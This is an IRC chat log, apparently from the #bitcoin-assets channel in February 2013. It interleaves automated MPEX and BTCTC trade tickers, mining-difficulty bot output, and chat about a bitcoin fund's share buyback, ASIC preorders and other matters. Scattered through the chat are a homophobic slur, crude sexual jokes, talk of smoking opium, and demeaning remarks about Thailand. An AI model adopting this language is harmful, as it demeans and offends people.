BTC went in, 1015 BTC of shares have been bought back, 90 BTC of dividends have been paid, we still hold between 507 and 1212 in assets Feb 17 22:58:29 OgNasty: its all detailed in that forum post Feb 17 22:59:01 so then why are you closing? Feb 17 22:59:12 if you have all the funds, what went horribly wrong? Feb 17 22:59:14 Im not, I want to buy the shares back because they're not legal. Feb 17 22:59:25 what went horribly wrong is nefario lied about legality of public shares Feb 17 22:59:31 so then sell your assets and put up a huge bid wall Feb 17 22:59:36 OgNasty: basically I am Feb 17 22:59:56 OgNasty: asicminer and btcmc cant be sold yet Feb 17 23:00:08 and btc-mining, the third and last asset, is the only asset of ours that went south Feb 17 23:00:23 I was only talking smack because I thought you were continuing to take investments. Feb 17 23:00:28 no, Im not Feb 17 23:00:36 I cant take investments until the shares have been bought back. Feb 17 23:00:54 [BTCTC] [S.MPOE-PT] 2 @ 0.00068 = 0.0014 BTC [-] Feb 17 23:01:03 So you want to buy them all back to resell them? Feb 17 23:01:06 no. Feb 17 23:01:27 Im going to issue zero coupon OID corporate bonds issued by a legally registered corporation in the US. Feb 17 23:02:03 EskimoBob: yes, a lot of people's shares are waiting. Feb 17 23:02:15 EskimoBob: if this could have been done overnight, I would have already. Feb 17 23:02:44 shoulda bought https://nastyfans.org seats instead :P Feb 17 23:03:01 [MPEX] [S.MPOE] 4321 @ 0.00064422 = 2.7837 BTC [-] Feb 17 23:03:03 [MPEX] [S.MPOE] 11543 @ 0.00064388 = 7.4323 BTC [-] Feb 17 23:03:05 [MPEX] [S.MPOE] 1645 @ 0.00064368 = 1.0589 BTC [-] Feb 17 23:03:06 [MPEX] [S.MPOE] 3153 @ 0.00064344 = 2.0288 BTC [-] Feb 17 23:03:07 [MPEX] [S.MPOE] 788 @ 0.00064262 = 0.5064 BTC [-] Feb 17 23:04:54 OgNasty: btw, worst case DMC owes 861 and only has 507 in assets, best case DMC owes 586 and has 1212 in assets. Feb 17 23:05:03 OgNasty: I imagine its going to be about even when it finally comes down to it Feb 17 23:06:04 Breaktime over... back to work I go. Feb 17 23:13:22 [MPEX] [S.MPOE] 4185 @ 0.00066206 = 2.7707 BTC [+] Feb 17 23:13:25 [MPEX] [S.MPOE] 1599 @ 0.00066273 = 1.0597 BTC [+] Feb 17 23:13:26 [MPEX] [S.MPOE] 3046 @ 0.00066274 = 2.0187 BTC [+] Feb 17 23:15:55 1 BTC = 27.02421 U.S. dollars = 20.2004859 Euros Feb 17 23:18:35 [MPEX] [S.MPOE] 4254 @ 0.00066274 = 2.8193 BTC [+] Feb 17 23:18:38 [MPEX] [S.MPOE] 4321 @ 0.00066297 = 2.8647 BTC [+] Feb 17 23:18:40 [MPEX] [S.MPOE] 18975 @ 0.00066298 = 12.58 BTC [+] Feb 17 23:20:16 <3 s.mpoe these days... selling at 66, buying at 64 Feb 17 23:37:00 i know Feb 17 23:37:04 it is crazy Feb 17 23:37:12 crossed quotes sitting there for like 15 minutes Feb 17 23:45:37 [MPEX] [S.MPOE] 5000 @ 0.00066276 = 3.3138 BTC [-] Feb 17 23:45:39 [MPEX] [S.MPOE] 4321 @ 0.00066277 = 2.8638 BTC [+] Feb 17 23:45:43 [MPEX] [S.MPOE] 4321 @ 0.0006629 = 2.8644 BTC [+] Feb 17 23:45:44 [MPEX] [S.MPOE] 23033 @ 0.00066298 = 15.2704 BTC [+] Feb 17 23:45:45 [MPEX] [S.MPOE] 19300 @ 0.00066325 = 12.8007 BTC [+] Feb 17 23:45:46 [MPEX] [S.MPOE] 10900 @ 0.00066449 = 7.2429 BTC [+] Feb 17 23:46:53 [MPEX] [S.MPOE] 6364 @ 0.00066508 = 4.2326 BTC [+] Feb 17 23:49:57 just noticed the wall at 0.0007 is now only 4885088 high? since when? Feb 17 23:55:22 09-02-13-06:23 [MPEX] [S.MPOE] 1811173 @ 0.0007 = 1267.8211 BTC [+] Feb 17 23:55:26 ? Feb 17 23:55:59 well.. missed it Feb 17 23:59:49 [MPEX] [S.MPOE] 11836 @ 0.00066356 = 7.8539 BTC [-] Feb 17 23:59:50 [MPEX] [S.MPOE] 23500 @ 0.00066683 = 15.6705 BTC [+] Feb 17 23:59:52 [MPEX] [S.MPOE] 7300 @ 0.00066733 = 4.8715 BTC [+] Feb 17 23:59:56 [MPEX] [S.MPOE] 18000 @ 0.00066852 = 12.0334 BTC [+] Feb 17 23:59:58 [MPEX] [S.MPOE] 10650 @ 0.00066869 = 7.1215 BTC [+] Feb 18 00:00:05 [MPEX] [S.MPOE] 5858 @ 0.00066907 = 3.9194 BTC [+] Feb 18 00:42:50 [MPEX] [S.MPOE] 2004 @ 0.00066907 = 1.3408 BTC [+] Feb 18 00:42:52 [MPEX] [S.MPOE] 1346 @ 0.00066974 = 0.9015 BTC [+] Feb 18 00:43:37 I'm 10 btc short on a transaction and waiting on gox for another 3 days, can anyone sell me 10 btc via BoA transfer? Feb 18 00:53:43 [MPEX] [S.DICE] 300 @ 0.00632331 = 1.897 BTC [-] Feb 18 00:56:54 BoA does btc transfers? Feb 18 01:04:11 what price swhitt? Feb 18 01:04:17 [MPEX] [S.MPOE] 2000 @ 0.00066973 = 1.3395 BTC [-] Feb 18 01:04:19 oh wait never mind Feb 18 01:04:19 [MPEX] [S.MPOE] 18500 @ 0.00066974 = 12.3902 BTC [+] Feb 18 01:04:48 sorry, I'm only looking for 5 btc now Feb 18 01:05:08 ~$140 Feb 18 01:09:21 [BTCTC] [RSM] 95 @ 0.0099 = 0.9405 BTC [+] Feb 18 01:11:12 swhitt: you should ask in #bitcoin-otc instead Feb 18 01:20:26 ,,ticker Feb 18 01:20:33 ;;ticker Feb 18 01:20:33 BTCUSD ticker | Best bid: 26.81004, Best ask: 26.98899, Bid-ask spread: 0.17895, Last trade: 26.81004, 24 hour volume: 76982.57348597, 24 hour low: 25.00000, 24 hour high: 27.39989, 24 hour vwap: 26.39660 Feb 18 01:27:37 whats the rite Feb 18 01:38:47 [BTCTC] [GSDPT] 24 @ 0.0065 = 0.156 BTC [+] Feb 18 01:40:04 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 18 01:42:04 [MPEX] [S.BBET] 1 @ 0.0019649 BTC [-] Feb 18 01:44:29 [MPEX] [S.BBET] 1 @ 0.0019649 BTC [-] Feb 18 01:45:18 [MPEX] [S.BBET] 1 @ 0.0019649 BTC [-] Feb 18 01:57:18 [MPEX] [S.DICE] 300 @ 0.0063233 = 1.897 BTC [-] Feb 18 02:03:20 [BTCTC] [GSDPT] 10 @ 0.0065 = 0.065 BTC [+] Feb 18 02:10:16 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 18 02:16:51 [MPEX] [S.MPOE] 4321 @ 0.00065408 = 2.8263 BTC [-] Feb 18 02:16:51 [MPEX] [S.MPOE] 4321 @ 0.00065398 = 2.8258 BTC [-] Feb 18 02:16:53 [MPEX] [S.MPOE] 5377 @ 0.00065383 = 3.5156 BTC [-] Feb 18 02:22:51 [MPEX] [S.DICE] 100 @ 0.0063233 = 0.6323 BTC [-] Feb 18 02:28:58 ;;bc,stats Feb 18 02:29:01 Current Blocks: 221757 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 2 blocks | Next Difficulty In About: 15 minutes and 0 seconds | Next Difficulty Estimate: 3654931.77282 | Estimated Percent Change: 11.58514 Feb 18 02:29:07 ;;bc,diffchange Feb 18 02:29:13 Estimated percent change in difficulty this period | 11.5851408626 % based on data since last change | 31.9570583479 % based on data for last three days Feb 18 02:29:22 nplz Feb 18 02:29:46 ;;estimate Feb 18 02:29:47 Next difficulty estimate | 3654931.77282 based on data since last change | 4322206.71566 based on data for last three days Feb 18 02:30:50 [MPEX] [S.MPOE] 4321 @ 0.00065393 = 2.8256 BTC [+] Feb 18 02:30:52 [MPEX] [S.MPOE] 2779 @ 0.00065383 = 1.817 BTC [-] Feb 18 02:41:51 [MPEX] [S.MPOE] 3944 @ 0.00065383 = 2.5787 BTC [-] Feb 18 02:41:53 [MPEX] [S.MPOE] 4321 @ 0.00065283 = 2.8209 BTC [-] Feb 18 02:41:54 [MPEX] [S.MPOE] 335 @ 0.00065282 = 0.2187 BTC [-] Feb 18 02:56:29 [MPEX] [S.DICE] 100 @ 0.0063233 = 0.6323 BTC [-] Feb 18 03:07:00 [MPEX] [S.MPOE] 1569 @ 0.000655 = 1.0277 BTC [+] Feb 18 03:12:29 ;;bc,stats Feb 18 03:12:33 Current Blocks: 221765 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 2010 blocks | Next Difficulty In About: 1 week, 3 days, 11 hours, 15 minutes, and 0 seconds | Next Difficulty Estimate: 10464702.0526 | Estimated Percent Change: 186.62473 Feb 18 03:19:36 ;;seen mircea_popescu Feb 18 03:19:36 mircea_popescu was last seen in #bitcoin-assets 4 hours, 51 minutes, and 57 seconds ago: http://www.youtube.com/watch?v=PbcctWbC8Q0 hitler finds out he's really a 13yo faggoty kid. Feb 18 03:23:47 [MPEX] [S.DICE] 486 @ 0.00613006 = 2.9792 BTC [-] Feb 18 03:37:17 [MPEX] [S.MPOE] 4321 @ 0.00065416 = 2.8266 BTC [-] Feb 18 03:37:22 [MPEX] [S.MPOE] 7379 @ 0.00065418 = 4.8272 BTC [+] Feb 18 03:41:32 [MPEX] [S.MPOE] 5850 @ 0.00065418 = 3.827 BTC [+] Feb 18 03:42:32 [MPEX] [S.MPOE] 10358 @ 0.00065418 = 6.776 BTC [+] Feb 18 03:42:33 [MPEX] [S.MPOE] 373 @ 0.00065519 = 0.2444 BTC [+] Feb 18 03:49:41 breaking news walletbit sucks Feb 18 03:50:01 We at BitVPS use BitPay Feb 18 03:50:37 dont you take btcs direclty? Feb 18 03:51:09 Not anymore, too much price volatility, clients were being charged different recurring rates for the same services. Feb 18 03:51:27 hm Feb 18 03:51:28 Now they have fixed USD invoices they can pay with BitPay and conversion is handled on the fly. Feb 18 03:51:42 It seemed more fair that way. Feb 18 03:52:17 hm Feb 18 03:52:25 so to pay the divs you buy back btc ? Feb 18 03:58:01 [MPEX] [S.DICE] 100 @ 0.0062 = 0.62 BTC [+] Feb 18 03:58:45 [MPEX] [S.DICE] 14 @ 0.0063233 = 0.0885 BTC [+] Feb 18 04:01:57 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1134 BTC [+] Feb 18 04:05:37 wats happening Feb 18 04:07:01 [MPEX] [S.MPOE] 2752 @ 0.00065513 = 1.8029 BTC [-] Feb 18 04:07:02 [MPEX] [S.MPOE] 4321 @ 0.00065518 = 2.831 BTC [+] Feb 18 04:07:03 [MPEX] [S.MPOE] 7198 @ 0.00065519 = 4.7161 BTC [+] Feb 18 04:13:29 of what? rabbit cockvagina I hope Feb 18 04:13:58 cue MP with a dtng link Feb 18 04:19:08 [MPEX] [S.MPOE] 2869 @ 0.00065519 = 1.8797 BTC [+] Feb 18 04:20:12 [MPEX] [S.DICE] 300 @ 0.0063233 = 1.897 BTC [+] Feb 18 04:23:56 [MPEX] [S.MPOE] 4321 @ 0.00065962 = 2.8502 BTC [+] Feb 18 04:23:58 [MPEX] [S.MPOE] 1188 @ 0.00065963 = 0.7836 BTC [+] Feb 18 04:28:26 it is not Feb 18 04:31:49 [MPEX] [S.MPOE] 10912 @ 0.00065963 = 7.1979 BTC [+] Feb 18 04:31:51 [MPEX] [S.MPOE] 3343 @ 0.00065991 = 2.2061 BTC [+] Feb 18 04:31:52 [MPEX] [S.MPOE] 4895 @ 0.00066234 = 3.2422 BTC [+] Feb 18 04:35:36 coal? nuclear? Feb 18 04:36:17 the dark side Feb 18 04:36:17 [MPEX] [S.MPOE] 4528 @ 0.00066234 = 2.9991 BTC [+] Feb 18 04:36:20 [MPEX] [S.MPOE] 6672 @ 0.00066841 = 4.4596 BTC [+] Feb 18 04:36:48 up up up Feb 18 04:38:35 kakobrekla: no, we keep everything in BTC Feb 18 04:43:51 https://bitcointalk.org/index.php?topic=144447.msg1535569#msg1535569 Feb 18 04:43:58 all fixed, got my coinz for coinbase. Feb 18 04:44:02 3.5 days later Feb 18 04:44:05 well, 3 **** BEGIN LOGGING AT Mon Feb 18 14:59:14 2013 Feb 18 15:02:45 PSA : if anyone has a legitimate claim against WBX, please make a claim with dooglus : https://dooglus.com/wbx/ Feb 18 15:03:22 [MPEX] [S.MPOE] 1661 @ 0.00066132 = 1.0985 BTC [-] Feb 18 15:07:33 cant sleeep Feb 18 15:08:45 [MPEX] [S.MPOE] 4321 @ 0.00067748 = 2.9274 BTC [+] Feb 18 15:08:47 [MPEX] [S.MPOE] 10000 @ 0.00067781 = 6.7781 BTC [+] Feb 18 15:08:49 [MPEX] [S.MPOE] 7231 @ 0.00067782 = 4.9013 BTC [+] Feb 18 15:18:36 morning all Feb 18 15:19:43 40 more mins for asic pre orders again Feb 18 15:20:49 avalons? Feb 18 15:20:58 yeap Feb 18 15:21:10 have the first batch made it past customs? Feb 18 15:21:47 dont know,maybe Feb 18 15:21:57 theres been delay do to cny Feb 18 15:24:30 [MPEX] [S.MPOE] 6250 @ 0.00067699 = 4.2312 BTC [-] Feb 18 15:25:20 quite a mystery... how do coinbr users manage to cancel multiple orders within one microsecond? Feb 18 15:28:46 HFT will find a way. dinoegg.png Feb 18 15:35:26 [MPEX] [S.MPOE] 1800 @ 0.00067063 = 1.2071 BTC [-] Feb 18 15:40:29 [MPEX] [S.MPOE] 2050 @ 0.00067063 = 1.3748 BTC [-] Feb 18 15:42:11 [BTCTC] [B.YABMC] 1 @ 0.01511 BTC [-] Feb 18 15:42:13 [BTCTC] [B.YABMC] 2 @ 0.0151 = 0.0302 BTC [-] Feb 18 15:42:15 [BTCTC] [B.YABMC] 9 @ 0.01312 = 0.1181 BTC [-] Feb 18 15:44:07 [MPEX] [S.MPOE] 4459 @ 0.000672 = 2.9964 BTC [+] Feb 18 15:44:11 [MPEX] [S.MPOE] 91 @ 0.00067752 = 0.0617 BTC [+] Feb 18 15:44:47 [BTCTC] [BASIC-MINING] 1 @ 0.35 BTC [+] Feb 18 15:48:56 [BTCTC] [BTC-MINING] 1 @ 0.03011 BTC [+] Feb 18 15:56:58 [BTCTC] [SYNERGY] 7 @ 0.089 = 0.623 BTC [+] Feb 18 15:57:48 [MPEX] [S.MPOE] 4000 @ 0.00067752 = 2.7101 BTC [+] Feb 18 15:58:56 [BTCTC] [BITVPS] 5 @ 0.0044 = 0.022 BTC [-] Feb 18 15:59:22 [BTCTC] [BITVPS] 1 @ 0.0044 BTC [-] Feb 18 16:09:24 pigeons not yet Feb 18 16:09:27 ASICs are now available for pre order Feb 18 16:09:28 !! Feb 18 16:09:37 some people think it is not really made :/ Feb 18 16:10:12 but it will be lol if they had, 5,000 people trying to buy 5 units Feb 18 16:10:17 it will still be lol though Feb 18 16:11:24 yeah well they didnt just make the 2 that made it to the us and the 2 the are mining in china Feb 18 16:12:02 but yeah not showing up makes you take pause before spending money. well maybe not, look at all the bfl orders and basic too Feb 18 16:14:39 pigeons look at the people who paid pirate :/ Feb 18 16:14:53 usagi you want to short btc? Feb 18 16:15:17 [MPEX] [S.MPOE] 2000 @ 0.00067751 = 1.355 BTC [-] Feb 18 16:15:19 [MPEX] [S.MPOE] 230 @ 0.00067752 = 0.1558 BTC [+] Feb 18 16:15:21 [MPEX] [S.MPOE] 220 @ 0.00067782 = 0.1491 BTC [+] Feb 18 16:16:09 [MPEX] [S.MPOE] 2500 @ 0.00067782 = 1.6946 BTC [+] Feb 18 16:18:07 k, sold Feb 18 16:18:54 well if you want to short, why not sell? Feb 18 16:18:59 do you want leverage? Feb 18 16:19:47 [MPEX] [S.MPOE] 3450 @ 0.00067782 = 2.3385 BTC [+] Feb 18 16:21:06 ahh Feb 18 16:21:26 [MPEX] [S.MPOE] 468 @ 0.00067782 = 0.3172 BTC [+] Feb 18 16:21:27 [MPEX] [S.MPOE] 32 @ 0.0006779 = 0.0217 BTC [+] Feb 18 16:26:06 [MPEX] [S.MPOE] 3798 @ 0.0006779 = 2.5747 BTC [+] Feb 18 16:26:08 [MPEX] [S.MPOE] 8402 @ 0.00067795 = 5.6961 BTC [+] Feb 18 16:29:13 first you load the gun and point it at yourself Feb 18 16:29:33 lol Feb 18 16:30:03 i used the wrong word Feb 18 16:32:35 Okay guys sold out Feb 18 16:32:42 Avalon ASICS sold out Feb 18 16:33:40 I'm gonna buy bitcoins to seal my position on buttcoins Feb 18 16:33:51 so its just like i bought asics with cash Feb 18 16:34:12 umm, there were only 5, sure it was going to sell out Feb 18 16:35:58 you mean 343 Feb 18 16:36:10 in the latest sale? Feb 18 16:36:20 yes. Feb 18 16:36:39 took like 2 mins Feb 18 16:37:04 i see Feb 18 16:37:12 had i know it was 343 i would have tried Feb 18 16:37:18 known Feb 18 16:37:23 5 i was like lol Feb 18 16:38:01 Order #1421 Feb 18 16:38:06 nb Feb 18 16:38:12 ;;bc,stats Feb 18 16:38:15 Current Blocks: 221858 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1917 blocks | Next Difficulty In About: 1 week, 4 days, 6 hours, 38 minutes, and 7 seconds | Next Difficulty Estimate: 4370723.57006 | Estimated Percent Change: 19.71267 Feb 18 16:39:51 ive stayed up.. pulled an all nighter Feb 18 16:39:55 maybe i can sleep now Feb 18 16:40:26 ? Feb 18 16:40:30 are you in school? Feb 18 16:40:36 nah Feb 18 16:40:41 funemployed Feb 18 16:40:44 too old? Feb 18 16:40:46 funemployed? Feb 18 16:40:54 da fuck does that even mean lol Feb 18 16:41:01 my job is to have fun Feb 18 16:41:14 so "retired"? Feb 18 16:41:21 nah, im only 20 Feb 18 16:41:25 you have to work first to be retired Feb 18 16:41:34 i have a 6 month work cycle Feb 18 16:41:44 ? Feb 18 16:41:47 i work at a nursery, dealing with plants ect Feb 18 16:41:52 ahh Feb 18 16:41:57 what area? Feb 18 16:41:57 its a chill job Feb 18 16:42:01 vancouver Feb 18 16:42:08 ahh,, "plants" Feb 18 16:42:13 yeap Feb 18 16:42:20 greenhouse no 13, dont go there Feb 18 16:42:24 the rest are legit Feb 18 16:42:25 lol Feb 18 16:42:31 :) Feb 18 16:42:42 it can get boring when im off season Feb 18 16:42:48 i bet Feb 18 16:42:50 so.. i employ myself to have fun Feb 18 16:42:56 hence, funemployed Feb 18 16:42:57 iv been out of work for a while Feb 18 16:43:08 also, got my asic. ill retire a miner Feb 18 16:43:09 :) Feb 18 16:43:10 i spend more when not working Feb 18 16:43:11 lol Feb 18 16:43:18 i has asicminer stock Feb 18 16:43:20 im still rolling though Feb 18 16:43:33 i drink or smoke opium Feb 18 16:43:34 i really got nothing to spend money on Feb 18 16:43:50 in thailand they have piles of virgins and soo much beer..... Feb 18 16:43:55 [MPEX] [S.MPOE] 471 @ 0.00067696 = 0.3188 BTC [-] Feb 18 16:43:57 [MPEX] [S.MPOE] 16550 @ 0.00067663 = 11.1982 BTC [-] Feb 18 16:43:59 [MPEX] [S.MPOE] 5327 @ 0.00067048 = 3.5716 BTC [-] Feb 18 16:44:03 but.. i though thailand is full of traps Feb 18 16:44:19 they has traps if you like that, but you have to seek them out Feb 18 16:44:26 unless you are in a tourist bar! Feb 18 16:44:37 no traps for me lol Feb 18 16:44:48 iv never tried myself Feb 18 16:44:53 i swear i have the easiest life ever Feb 18 16:44:58 freeest ride lol Feb 18 16:45:10 growing pot must be easy unless you get jailed Feb 18 16:45:19 nah Feb 18 16:45:32 i grow legit stuff lol Feb 18 16:45:37 tomatoes and shit Feb 18 16:45:45 yeah i bet lol Feb 18 16:45:56 its a chill living, plenty comfy right now Feb 18 16:46:02 growing tomatoes for 6 months stil has btc for asics Feb 18 16:46:09 but.. all i do is play videogames Feb 18 16:46:09 lol Feb 18 16:46:26 hey im paid a decent wage Feb 18 16:46:30 i have a lot of video cards but i cant get into gming Feb 18 16:46:36 for the amount of shit i do Feb 18 16:46:39 in thailand we dont make a decent wage Feb 18 16:46:40 i guess im lucky Feb 18 16:46:49 yeah i bet Feb 18 16:48:04 [MPEX] [S.MPOE] 800 @ 0.00067795 = 0.5424 BTC [+] Feb 18 16:53:43 [MPEX] [S.MPOE] 3012 @ 0.00067048 = 2.0195 BTC [-] Feb 18 16:53:45 [MPEX] [S.MPOE] 4321 @ 0.0006682 = 2.8873 BTC [-] Feb 18 16:53:48 [MPEX] [S.MPOE] 3878 @ 0.00066819 = 2.5912 BTC [-] Feb 18 16:53:49 [MPEX] [S.MPOE] 1489 @ 0.00066818 = 0.9949 BTC [-] Feb 18 16:55:28 [BTCTC] [B.YABMC] 1 @ 0.02299 BTC [+] Feb 18 16:57:40 [MPEX] [S.MPOE] 1000 @ 0.00067795 = 0.678 BTC [+] Feb 18 17:06:53 [MPEX] [S.MPOE] 3000 @ 0.00066819 = 2.0046 BTC [-] Feb 18 17:06:54 [MPEX] [S.MPOE] 11186 @ 0.00066818 = 7.4743 BTC [-] Feb 18 17:06:55 [MPEX] [S.MPOE] 764 @ 0.00066253 = 0.5062 BTC [-] Feb 18 17:07:02 http://i.imgur.com/nInG3dD.jpg Feb 18 17:15:00 [MPEX] [S.MPOE] 7400 @ 0.00066253 = 4.9027 BTC [-] Feb 18 17:15:05 jcpham that is romania Feb 18 17:15:19 i read an artical about it somewhere that was a photo Feb 18 17:15:51 [MPEX] [S.MPOE] 4636 @ 0.00066253 = 3.0715 BTC [-] Feb 18 17:15:53 [MPEX] [S.MPOE] 2414 @ 0.00065654 = 1.5849 BTC [-] Feb 18 17:16:45 mp might know these kids Feb 18 17:16:49 Six-year old twins Gelu and Edi Petrache sit on stairs in a mansion on Easter Sunday in Buzescu, a small town in Romania. Buzescu is known for it's ultra-wealthy Roma and their bizarre mansions that line the main street. The Roma of Buzescu are part of the Kalderash clan and are known for being coppersmiths and.dealing with metal scraps. After the fall of the communist regime in the.late 80?s, they stripped old factories of their metals and so Feb 18 17:16:49 me made a small fortune re-selling them. Feb 18 17:17:50 [MPEX] [S.MPOE] 3998 @ 0.00067795 = 2.7104 BTC [+] Feb 18 17:17:51 [MPEX] [S.MPOE] 328 @ 0.00067853 = 0.2226 BTC [+] Feb 18 17:20:10 reselling the kids? Feb 18 17:20:39 sounds like Chaang-Noi's thing Feb 18 17:20:41 oh, i read the text backwards... Feb 18 17:20:50 i dont sell kids lol Feb 18 17:20:58 no, you just buy them. for dinner. Feb 18 17:21:04 lol Feb 18 17:21:25 im picky as fuck with what i eat Feb 18 17:21:30 id never eat a human Feb 18 17:21:41 unless i was going to die... Feb 18 17:26:59 [MPEX] [S.MPOE] 9850 @ 0.00066711 = 6.571 BTC [-] Feb 18 17:29:27 ill store gold for free lol Feb 18 17:30:33 [MPEX] [S.MPOE] 1907 @ 0.00065654 = 1.252 BTC [-] Feb 18 17:30:35 [MPEX] [S.MPOE] 2566 @ 0.00065653 = 1.6847 BTC [-] Feb 18 17:31:23 [MPEX] [S.DICE] 400 @ 0.0062955 = 2.5182 BTC [+] Feb 18 17:31:25 [MPEX] [S.DICE] 100 @ 0.0063 = 0.63 BTC [+] Feb 18 17:42:23 [MPEX] [S.MPOE] 984 @ 0.00065653 = 0.646 BTC [-] Feb 18 17:42:25 [MPEX] [S.MPOE] 4050 @ 0.0006555 = 2.6548 BTC [-] Feb 18 17:42:31 [MPEX] [S.MPOE] 2760 @ 0.00065449 = 1.8064 BTC [-] Feb 18 17:42:33 [MPEX] [S.MPOE] 9750 @ 0.00065448 = 6.3812 BTC [-] Feb 18 17:42:34 [MPEX] [S.MPOE] 5037 @ 0.00065441 = 3.2963 BTC [-] Feb 18 17:54:03 [MPEX] [S.MPOE] 2550 @ 0.00065441 = 1.6687 BTC [-] Feb 18 17:58:50 [MPEX] [S.MPOE] 2700 @ 0.00065826 = 1.7773 BTC [+] Feb 18 18:02:58 [MPEX] [S.MPOE] 2421 @ 0.00067054 = 1.6234 BTC [+] Feb 18 18:03:00 [MPEX] [S.MPOE] 9104 @ 0.00067077 = 6.1067 BTC [+] Feb 18 18:04:47 [MPEX] [S.MPOE] 4321 @ 0.00065462 = 2.8286 BTC [-] Feb 18 18:04:49 [MPEX] [S.MPOE] 9179 @ 0.00065441 = 6.0068 BTC [-] Feb 18 18:08:02 [MPEX] [S.MPOE] 2196 @ 0.00067077 = 1.473 BTC [+] Feb 18 18:08:03 [MPEX] [S.MPOE] 1192 @ 0.00067436 = 0.8038 BTC [+] Feb 18 18:23:50 [MPEX] [S.MPOE] 4500 @ 0.00067236 = 3.0256 BTC [-] Feb 18 18:23:57 [MPEX] [S.MPOE] 2000 @ 0.00065734 = 1.3147 BTC [-] Feb 18 18:23:59 [MPEX] [S.MPOE] 2590 @ 0.00065441 = 1.6949 BTC [-] Feb 18 18:31:27 [BTCTC] [S.DICE-PT] 5 @ 0.00645 = 0.0323 BTC [-] Feb 18 18:37:29 [MPEX] [S.MPOE] 3399 @ 0.00065441 = 2.2243 BTC [-] Feb 18 18:37:31 [MPEX] [S.MPOE] 10851 @ 0.0006544 = 7.1009 BTC [-] Feb 18 18:39:54 lol so gas is over 5 dollars a galon in california Feb 18 18:40:16 when bush was president it went over 3.5 after katrina, you could not read anything but how gas is over 3.5 Feb 18 18:40:28 now... silence. it's gonna go over 10 in a coupla years and it'll still be silent. Feb 18 18:40:43 the us press is literally the new soviet press i swear. Feb 18 18:40:58 it's still about 3.5 in florida i think Feb 18 18:41:14 i don't buy much gas... Feb 18 18:41:27 im just like wow, i gotta find out from people Feb 18 18:41:40 cause the press is busy misquotin ron paul or w/e Feb 18 18:42:03 i dont follow US news for US news Feb 18 18:42:45 I use BBC and Al Jazeera Feb 18 18:43:38 ima end up putting up a page filledwith what ppl living there tell me Feb 18 18:43:44 end up drudge#2 or some shit Feb 18 18:44:17 us news mostly isnt news at all Feb 18 18:44:47 its various marketing packaged as news Feb 18 18:45:53 ;;bc,stats Feb 18 18:45:55 Current Blocks: 221865 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1910 blocks | Next Difficulty In About: 1 week, 4 days, 7 hours, 14 minutes, and 33 seconds | Next Difficulty Estimate: 4193312.21943 | Estimated Percent Change: 14.85343 Feb 18 18:56:19 [MPEX] [S.MPOE] 3000 @ 0.00065809 = 1.9743 BTC [+] Feb 18 18:58:06 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 18 19:06:37 [MPEX] [S.MPOE] 3129 @ 0.00067362 = 2.1078 BTC [+] Feb 18 19:06:44 [MPEX] [S.MPOE] 171 @ 0.00067385 = 0.1152 BTC [+] Feb 18 19:10:19 [MPEX] [S.MPOE] 4321 @ 0.0006584 = 2.8449 BTC [-] Feb 18 19:10:21 [MPEX] [S.MPOE] 329 @ 0.00065809 = 0.2165 BTC [-] Feb 18 19:13:28 mircea_popescu: electric car drivers won't be affected :P Feb 18 19:18:05 ;;seen smickles Feb 18 19:18:05 smickles was last seen in #bitcoin-assets 1 week, 2 days, 15 hours, 7 minutes, and 25 seconds ago: pong Feb 18 19:18:25 um, where has smickles gone? Feb 18 19:29:40 [MPEX] [S.DICE] 32 @ 0.0063 = 0.2016 BTC [+] Feb 18 19:29:51 [MPEX] [S.DICE] 182 @ 0.00640596 = 1.1659 BTC [+] Feb 18 19:29:53 [MPEX] [S.DICE] 200 @ 0.0064096 = 1.2819 BTC [+] Feb 18 19:30:20 is there a way to get mtgox price via command line, not in irc? Feb 18 19:32:18 DeadWeasel: of course, API. https://mtgox.com/api/1/BTCUSD/ticker Feb 18 19:32:59 well, I guess I just have to learn some language and parse this? Feb 18 19:33:13 it's json Feb 18 19:33:15 json is easy though, right Feb 18 19:33:24 most languages have a library to parse this Feb 18 19:33:44 if you're looking for something easy to get started with, python isn't a bad place to start Feb 18 19:34:10 i've installed that, just need to cross the divide Feb 18 19:34:28 google is your friend Feb 18 19:35:18 what ide do you use? Feb 18 19:36:31 for python I just use vim Feb 18 19:37:43 looks like PyDev with eclipse might be good for this newb Feb 18 19:41:27 or geany Feb 18 19:51:16 [MPEX] [S.MPOE] 5411 @ 0.00065909 = 3.5663 BTC [+] Feb 18 19:58:37 [MPEX] [S.MPOE] 3289 @ 0.00066042 = 2.1721 BTC [+] Feb 18 19:58:39 [MPEX] [S.MPOE] 4711 @ 0.0006581 = 3.1003 BTC [-] Feb 18 20:04:42 ;;seen evoorhees Feb 18 20:04:42 evoorhees was last seen in #bitcoin-assets 5 days, 19 hours, 30 minutes, and 42 seconds ago: perfect Feb 18 20:04:50 odd Feb 18 20:05:08 [MPEX] [S.MPOE] 5289 @ 0.0006581 = 3.4807 BTC [-] Feb 18 20:05:13 sdice website and betting has been wonky lately Feb 18 20:14:03 [MPEX] [S.MPOE] 10100 @ 0.00066413 = 6.7077 BTC [+] Feb 18 20:16:50 [MPEX] [S.DICE] 1000 @ 0.00648691 = 6.4869 BTC [+] Feb 18 20:21:03 [MPEX] [S.DICE] 591 @ 0.0064869 = 3.8338 BTC [-] Feb 18 20:21:17 [BTCTC] [COGNITIVE] 1 @ 0.3411 BTC [-] Feb 18 20:22:06 [BTCTC] [COGNITIVE] 1 @ 0.341 BTC [-] Feb 18 20:22:08 [BTCTC] [COGNITIVE] 1 @ 0.341 BTC [-] Feb 18 20:22:35 its a scam. Feb 18 20:23:01 [BTCTC] [COGNITIVE] 29 @ 0.34 = 9.86 BTC [-] Feb 18 20:23:32 it's free money! Feb 18 20:24:27 o hey pizza, how is it going Feb 18 20:24:36 not bad Feb 18 20:24:37 yourself? Feb 18 20:24:47 alright, busy day :) Feb 18 20:24:52 [MPEX] [S.DICE] 823 @ 0.00638721 = 5.2567 BTC [-] Feb 18 20:24:59 looking forward to going to vegas in 2 days Feb 18 20:25:06 o? Feb 18 20:25:08 gambling? Feb 18 20:25:33 maybe just a little, brother's bachelor party Feb 18 20:25:45 if I wanted to 